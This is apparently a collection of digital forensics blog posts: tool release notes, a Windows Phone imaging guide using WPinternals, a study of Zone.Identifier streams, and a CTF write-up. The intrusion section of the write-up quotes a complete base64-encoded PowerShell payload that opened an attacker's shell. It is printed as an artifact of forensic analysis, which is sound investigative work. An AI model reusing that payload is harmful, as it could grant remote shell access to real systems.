New versions of most popular open source DFIR tools, Autopsy and TSK, have been released. Here are the lists of new features:

Autopsy

• A graph visualization was added to the Communications tool to make it easier to find messages and relationships.
• A new “Application” content viewer (lower right) that will contain file-type specific viewers (to reduce number of tabs).
• New viewer for SQLite databases (in Application content viewer)
• New viewer for binary PLists (in Appilcation content viewer)
• L01 files can be imported as data sources.
• Ingest filters can now use date range conditions for triage.
• Passwords to open password protected archive files can be entered (by right clicking on the file).
• Reports (e.g., RegRipper output) generated by ingest modules are now indexed for keyword search.
• PhotoRec carving module can be configured to keep corrupted files.
• Sector size can be specified for local drives and images when E01 is wrong or it is a raw image.
• New data source processor in Experimental module that runs Volatility, adds the outputs as files, and parses the reports to provide INTERESTING_FILE artifacts.
• Assorted small enhancements are included.

The Sleuth Kit

• Lots of bounds checking fixes from Google’s fuzzing tests. Thanks Google.
• Cleanup and fixes from uckelman-sf and others
• PostgreSQL, libvhdi, & libvmdk are supported for Linux / OS X
• Fixed display of NTFS GUID in istat – report from Eric Zimmerman.
• NTFS istat shows details about all FILE_NAME attributes, not just the first. report from Eric Zimmerman.
• Reports can be URLs
• Reports are Content
• Added APIs for graph view of communications
• JNI library is extracted to name with user name in it to avoid conflicts
• Database Version upgraded from to 8.0 because Reports are now Content

This project helps a forensics analyst explore offline Docker filesystems. Docker uses layered backend filesystems like AuFS or OverlayFS. Each layer is actually stored on the host’s filesystem as multiple folders, and some JSON files are used by Docker to know what is what.

Volatility Foundation has announced another contest – Volatility Analysis Contest. All you need is to choose a sophisticated malware sample, attack framework, or challenging security incident scenario and write an analysis report detailing how Volatility could be used to find relevant artifacts of the activity within memory. Click here for more details.

Here is a list of tips on getting hired in DFIR by Brett Shavers:

Darwin-Collector.sh is a script designed to be run against a mounted image, live system, or device in target disk mode. The script automates the collection of key files for MacOS investigations. You can learn more about the tool and download it here.

Craig Rowland from Sandfly Security goes over simple tactics and techniques you can use to assess a Linux host for signs of compromise:

Windows Phones are not frequent guests of our digital forensic lab, especially now, as Microsoft stopped developing the platform. Nevertheless, sometimes we have to forensicate such devices, so it’s very important to have methods of fast and simple data extraction. For quite a long time the only option of physical extraction has been JTAG or Chip-off techniques, but thanks to security researchers, this time Heathcliff, now we have a tool, which can help digital forensics professionals to create physical dumps of a number of WP models. And this tool is WPinternals.

The tool allows to unlock bootloader and gain root access to the phone. It’s important to note, that this technique works even with locked phones. For example, we had a locked phone, and there were more than 1 000 000 seconds for the next unlock try, but we successfully created a physical image with WPinternals and decoded it with Oxygen Forensic Detective.

Once you connect the phone to you workstation, the tool will automatically detect its model. First of all, you should download two or more files the tool will need to unlock the phone. The first one is FFU or Windows Full Flash Update file, the second – emergency files for the model you are working with. By the way, WPinternal supports the following models: Lumia 520, 521, 525, 620, 625, 720, 820, 920, 925, 928, 1020 and 1320; and the following operating systems: 8.10.12393.890, 8.10.12397.895, 8.10.14219.341, 8.10.14226.359, 8.10.14234.375, 8.10.15116.125, 8.10.15148.160, 10.0.10512.1000, 10.0.10536.1004, 10.0.10549.4, 10.0.10581.0, 10.0.10586.11, 10.0.10586.36.

Figure 1. Downloading FFU and emergency files

If downloaded FFU contains unsupported OS version, the tool will download another FFU and extract files it needs from it.

Figure 2. Using another FFU because of unsupported OS version

During unlocking process Windows Phone Internals will scan for flashing profile, the phone may appear to be in a reboot-loop, but it’s expected behavior:

Figure 3. Scanning for flashing profile

Once it’s found, WPinternals will flash unlocked bootloader:

Figure 4. Flashing unlocked bootloader

Now the phone should be in Mass Storage Mode:

Figure 5. Mass Storage Mode

That’s what we need! It’s time to image it. You can use any tool you like from those you use for HDD imaging, for example, FTK Imager:

Figure 6. Imaging a Windows Phone with FTK Imager

So this is this easy, now we have full physical image of our phone’s internal memory:

Figure 7. Windows Phone image partition structure

Now it’s ready to be processed with a mobile forensic tool of your choice, or can be examined manually. There are a lot of partitions, but the most interesting from a forensic perspective are MainOS and Data.

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

SANS Institute has published the presentations from DFIR Summit & Training 2018. You can find all of them here.

Koen Van Impe has posted a nice overview of RDP and its logs, that will be quite useful both for incident responders and forensic analysts.

Mari DeGrazia continues her series of blogs about detecting and analysis of malicious PowerShell scripts. This time you’ll learn how to find such scripts in Windows registry with Registry Explorer and RegRipper.

In this post guys from Sandfly Security describe the process of detection poisoned Linux binaries. You will learn about the procees of binary poisoning and how to detect it both manually and automatically.

Epochalypse utility by Pasquale Stirparo has been updated. Now it supports APFS timestamps. You can download this Python script at Pasquale’s GitHub.

As you may know, David Cowen runs Sunday Funday Challenges, and one of the most recent was Zone.Identifier challenge. I haven’t won, but I decided to post my submission as it contains some additional info. So, here we go:

Windows XP SP2 introduced Zone.Identifier Alternative Data Stream, that is created alongside with the file downloaded from the Internet or intranet. Zone.Identifier is generated by applications when user saves files to the local file system from a different security zone. There are 5 most commonly-encountered zone identifiers:

0 – Local Machine Zone, the most trusted zone for content that exists on the local computer;

1 – Local Intranet Zone, for content located on an organization’s intranet;

2 – Trusted Sites Zone, for content located on Web sites that are considered more reputable or trustworthy than other sites on the Internet.

3 – Internet Zone, for Web sites on the Internet that do not belong to another zone;

4 – Restricted Sites Zone, for Web sites that contain potentially-unsafe content.

I started my testing from 8 web-browsers: Google Chrome, Microsoft Edge, Mozilla Firefox, Internet Explorer, Opera, Tor, UC Browser and Vivaldi. I downloaded the same file to the same folder, and used AlternateStreamView to look at Zone.Identifier:

A few important facts: Internet Explorer hasn’t created a stream, stream size is different and depends on the browser used.

Ok, let’s look what exactly is contained within them.

Google Chrome:

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Not bad, huh? We have not only the zone, but also referrer and host URLs. Awesome!

Microsoft Edge:

LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe

ZoneId=3

Again, we have the zone, of course, but also browser name. No website or URL, unfortunately.

Firefox:

ZoneId=3

Unfortunately, only the zone.

Opera:

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

As far as I remember, it’s based on Chrome, so we have the same here. Not bad.

Tor:

ZoneId=3

Tor is based on Firefox, so we have only the zone.

UC Browser:

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Probably this browser is also Chrome-based, a lot of good info.

Vivaldi:

ZoneId=3

ReferrerUrl=http://cyberforensicator.com/

HostUrl=http://cyberforensicator.com/wp-content/uploads/2017/08/CF_LOGO_NEW.png

Same here, a lot of useful info.

So, Zone.Identifier may contain different sets of data, it depends on the browser used for file downloading.

Also, I decided to test what happens to files downloaded from mail clients. Let’s look at Microsoft Outlook 2016:

ZoneId=3

Zone Identifier only, anyway, we know that it’s downloaded and not created on local computer.

I thought it wasn’t enough and tested it with Mozilla Thunderbird too. I got the same:

ZoneId=3

Not enough, let’s look at Windows Mail:

ZoneId=3

So, same here.

Also I looked at Windows cloud applications: Google Drive, Mega Sync, pCloud, Box, but haven’t found Zone.Identifier ADS in any files. Of course, such apps are usually used for uploading files, but some standard files are downloaded from the cloud to local computer by these apps. What is more, some files may be uploaded from different devices and downloaded to local computer during sync process.

I decided not to stop, and tested μTorrent app, it creates Zone.Identifier too:

ZoneId=3

HostUrl=about:internet

I downloaded two different files, both have same HostUrl, so it may be used for detecting files downloaded via torrents, at least via μTorrent.

I continued my testing with a few more torrent clients:

BitTorrent creates the same Zone.Identifier:

ZoneId=3

HostUrl=about:internet

As for 2 other clients, Transmission and Vuze, they do not add Zone.Identifier.

Also I played a bit with TeamViewer, both using file transferring feature and copy+paste – no Zone.Identifier for transferred files. Same with FlashGet download manager – no Zone.Identifier for downloaded files.

Then I decided to test a few chat apps, started from Telegram, and got the following:

ZoneId=3

So Telegram Desktop adds Zone.Identifier too.

Finally I decided to test another popular messenger – Skype:

ZoneId=3

As you can see, there are lots of applications capable of creating Zone.Identifier ADS, so this topic needs much more research and testing. Also, don’t forget to check Phil Moore’s winning submission.

Happy Forensicating!

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Heather Mahalik has posted about a list of recommendations on iOS and Android-based smartphones forensic acquisition. If you haven’t checked it yet, it’s high time to do it!

Yesterday Troy Schnack and Kevin Pagano suggested on Twitter that it would be good to write how I solved Magnet User Summit CTF. I thought it was a good idea, and decided to do it with my friend Igor Mikhaylov. This will be a series of posts, and the first part is dedicated to anti-forensics.

Wiping App

This is really easy question, especially if you are using Magnet AXIOM. Just look at Encryption / Anti-forensics Tools tab, and you’ll find that it’s Eraser:

User that Wiped

We started from UserAssist, of course. What did we see? Eraser 6.2.0.2982.exe was downloaded and ran by itsupport, and… it was the flag:

Data Written

This is easy too – SRUDB.dat. Also, you can find the answer to the previous question here as it contains user SID too. But we are interesting in the amount of data written, and it’s 27394048:

Browser to Download Wiper

This is a bit tricky. You must know that both Internet Explorer and Edge store data at the same ESE database – WebCacheV01.dat. Magnet AXIOM shows it as Internet Explorer 10-11 Main History, but the flag isn’t Internet Explorer, it’s Edge:

Wiped File Names

This is one of the hardest questions. The answer is hidden in $UsnJrnl. First of all, you should extract $J file:

Next, you should parse it. I used UsnJrnl2Csv. For CSV output analysis I used Timeline Explorer. According to prefetch files, eraser.exe was last run on 26.04.2018 18:41:07. Let’s look at suspicious activity after:

Looks strange, huh? So, applypatch-msg.sample is the first file name we are looking for. If you scroll down, you’ll find other file names, more than 5 actually. So the flag may be applypatch-msg.sample, commit-msg.sample, fsmonitor-watchman.sample, post-update.sample, pre-applypatch.sample.

That’s all for today!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

We are continuing our write-up. The second part will walk you through the solution of the second set of CTF problems – Misc.

Timezone

Again, very easy task, but it’s only the beginning. You can find the flag in Timezone Information section of AXIOM, or via manual analysis of TimeZoneInformation key:

As you can see, the flag is Mountain.

VSN – C

Another easy task – finding volume serial number. There are lot’s of tools capable of providing you with this info, but we will you AXIOM again – the flag is 6C19-1B65:

YouTube Search

Not difficult at all either. It’s time to analyze browsing history. A good idea is to filter data as we need 3/28/2018. Once it’s filtered, you can search for “youtube”. Bingo! We got the flag – simpsons max power:

Sleuthkit + PowerShell

The system we are analyzing has great logging capabilities, so you can find PowerShell transcripts in the Documents folder. But it’s not all. If you search for “SRUDB.dat”, you’ll quickly find ConsoleHost_history.txt, where you can find the flag – $inode = ifind -n /Windows/System32/sru/SRUDB.dat \\.\C: ; icat \\.\C: $inode > SRUDB.dat:

Administrator Logon Count

Extremely easy with AXIOM – look at User Accounts section. The flag is 14:

Install Q

It’s time to look at Installed Programs list, it’s very easy to find this flag – 2018-04-11:

File Sequence Number

This was the time to test new tool by Eric Zimmerman – MFTEcmd. First you should export $MFT file and parse it with the tool. Next – search for “python.exe”. The flag is 1:

Filename Lookup

You can use the same CSV, and search for “86280”. The flag is $UsnJrnl:

File Timestamp

Again, same CSV. Search for “CMD.EXE-89305D47.pf” and look at Last Access0x10. So the flag is 2018-04-26 15:48:40:

Who Installed Atom?

Let’s look at Installed Programs list again:

So, now we know it’s maxpowers, who installed it. Let’s get SID. Look at User Accounts:

As you can see, the flag is S-1-5-21-2801897208-1878083585-4182000528-1002.

Deletion in LogFile

AXIOM is capable of parsing $LogFile contents, so you can find the flag in $LogFile Analysis section:

As you can see, the deleted file’s name is 7z.dll, and this if the flag.

That’s all for today!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

So, we decided to finish our write-up today. The forth part – the most interesting part. Intrusion! Again, no more AXIOM, only free and open source tools!

Method of Attack

What was the method of attack the threat actor used?

So, we started from Windows Event Logs analysis, and very soon found our favorite base64-encoded string in Windows PowerShell.evtx:

The event took place on 04/26/2018 16:01:39 (UTC). We decided to look for opened documents around that time as weaponized documents are common media in such attacks. Soon we found an LNK file indicating that EpochConversionExample.xls was opened on 04/26/2018 16:01:38. The document is located under C:\Users\maxpowers\Desktop\EpochConversionExample\. Let’s look inside:

Surprise! Ok, we have found weaponized document. It’s time to find its origin. So, it’s inside EpochConversionExample folder on the Desktop. Also, you can find an archive with the same name and… Zone.Identifier ADS:

ZoneId=3

So, it was downloaded from the Internet. Where should we start? Emails or browsing history? Emails seem to be a better choice. Let’s look at mpowers@magnetic4nsics.com.ost located under C:\Users\maxpowers\AppData\Local\Microsoft\Outlook\. You can use SysTools OST Viewer to browse its contents. Let’s search for the attachment of interest. Here it is:

So, our victim got an archive with weaponized document via email, the flag is phishing.

Attack Email Address

What was the email address associated with the attacker?

As you can see on the last screenshot, the email is thanks2u2andu@gmail.com.

Malicious Document

What is the file name of the malicious document the attacker used?

Again, we already know that it’s EpochConversionExample.xls.

Base64 Payload

What was the BASE64 payload that gave the attacker a shell? [BASE64 value]

As you have seen in the logs, the payload is:

pVZNj9s2EL37VxCGDjbWWlAS9eEYCyRtUCBAkQbdbXswfKAoqiuUlgSJzno37X8vZyRS1joBivQy5HCGb97MUKQ8Qe7I2+Vi/16pD8e26fRq+Zfsaqmi8LZQark+kPaUq0qQXnNtBnnWxk4+1PqT7sjvVadPXL1TqhGrce1pQ05Vrcl5HJ/H8WW9++44P3aSa/nwaIbCxjmNuJ83ZIo8zi5ijyuvox/7z6LT/yX2UR57qVfXyN+fVd40ytbuU9doKRy+at8VRSf7fsQvnu6rFzkqpfoon8YNG9Kc9LCs2lL9oorRYAgt3y68xnTWQPkPz60kvkkil917WVZ1paumJp4g/kd+lGT5R1VH4ZL4tdH6lgtJcOWnUy3Asyd+y/teP3anhXe+85o3b2Zdpxt6DiiFIRoGytY7sv/hWcv94eD1cMTouRTGIjMjshB86EwkILItuMQAFBgh0MDAkBsRDxGciihipgbOOQU1hGi0NCJPjWAc1hILX4KBA0AEIoG1FGYU98IshGgCuYAzLUCgCngS/MrQBo/TORfHFONGjimDWYDRgJ+MYC2zyAWIOHBQW0tjsEYOBQyBA4i4XUNr5AoxbPtK0t9MK0JQCJlCK0rYSyFGCn4lWKPcqiGzfhJmceaIZ9Y6EU8SxwoYsHzmHIjrLOmrPNwpYczCo4hzK7CNWLWY20pi0phRXDrBLXIA3ZLIBTKKQSSYJRZ2fljRkEKZUmcd8Ji1Yn/RBc8aTS1nPPzIBfPIQd261k4xQnAWzILGLi4aMlRz6zzgQQMSyIhy54znHnsU2rOBBuoyStF56/glNtorwb4yQyiJIZGBK/FEaJtaVvgtxAif2r1bCMnBL2W2b9PeDAReAGjFtNDKJKiZO3XuVknSzfWtwuczdk0Dq1FgxTPbywsa0GQ88kPBIHjkTjHOEJm5klBq851oxMmcCwYCwZEQxMBb76J0kTVM2wbi0f9gj4fBBZ/osm9Vbeo0ze2RwnZH805PhLApCZSJFdddjaUVuIa3wHBHlLbnqUOehIQEt/m1Ybi0IMvhm0ksA+EMOW7D7w0MPLzuB9Z0JLlblE1HVl51R3deRXwljdKL259l/ad+9IO1Wb25WZMv8AyOPwb74eU+rLzz7UNjlChcrW+8ar0hZuveqw4bEqzJ3/Be+/VJqd0/5nVWRTs81/A67hbeo+zk5eNqfws888Ox/w1RD+NDe6GHoP0qy8MFoHn/vReEmv01mVQ3BgwGat7ne8077d8rKVvi30vR1AUBdEr/BQ==

Decoded Imports

What two DLLs were imported in the base64 payload? [Comma separated with extensions]

Let’s look at the same log record again:

As you can see, the flag is kernel32.dll, msvcrt.dll.

First Login

What was the system time of the first login by the attacker? [UTC timestamp in the “YYYY-MM-DD hh:mm:ss” format]

To solve it, you need to analyze Windows Event Logs again. This time Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx. We already know that the host ws compromised on 04/26/2018 16:01:39 (UTC). So let’s start from this time and date. We see a few RDP logons and logoffs from 71.229.178.80, but than, at 04/26/2018 18:16:29 (UTC), a logon from 47.189.34.73:

So, the flag is 2018-04-26 18:16:29.

Gemini

What was the second account the attacker logged into?

So, according to the same log file, the host was accessed via RDP with itsupport user account too, but for some reason the flag is maxpowers.

After Exfil

What was the last website the attacker went to after logging in as Max Powers for the last time?

Let’s look at browsing history. For example, at History file located under C:\Users\maxpowers\AppData\Local\Google\ChromeUser Data\Default\:

As you can see, the last record is https://github.com/mpower4nsic/ProjectE/settings/delete, and the flag is https://github.com.

What happened to project e?

What was the last thing that happened to Project E after the attacker logged into Max Powers github?

Let’s look at browsing history again – Project E was deleted.

That’s all! CTF is solved! Thanks for reading!

Happy forensicating!

About the authors

Oleg Skulkin, GCFA, MCFE, ACE, is a DFIR enthusional (enthusiast + professional), Windows Forensics Cookbook and Practical Mobile Forensics co-author.

Igor Mikhaylov, MCFE, EnCE, ACE, OSFCE, is a digital forensic examiner with more than 20 years of experience and Mobile Forensics Cookbook author.

This is a quick look at the recently revealed “activities” API within Office 365. This undocumented interface provides investigators with a wealth of detailed information that was previously believed to be unavailable. It appears to work with all Office 365 enterprise plans, and requires no action to enable.

Over its last few releases, Apple’s iOS—the operating system running on iPhones, iPads, and other mobile devices—has steadily enhanced its offerings designed for both security and user convenience. Each sub-version of both iOS 10 and 11 added or changed small features that have drastically changed the forensic workflow.

In this paper, we’ll describe how to:

• Access more evidentiary data with new acquisition methods and tools, including GrayKey, biometric authentication, and even encrypted backups that you can create yourself.
• Look for data stored in new or different .plist and SQLite database locations, as well as entirely new datasets including .plists associated with the Do Not Disturb While Driving feature.
• Understand artifact changes, such as the new nanosecond timestamp format, Safari browser history, and new high efficiency photo and video file formats, that might affect how your forensic tool parses data.

This presentation will share some of the techniques and lessons learned in real-world Hadoop implementation at Johns Hopkins. Data will be sanitized as expected. But the focus will be on strategies and techniques used to collect and monitor audit and access log events from key Hadoop services and forwarding to a central server for monitoring, analysis, and response to any suspected breaches or incidents. Automation techniques, such as Ansible scripts to install agents or forwarders uniformly and efficiently across the cluster nodes will also be highlighted where appropriate.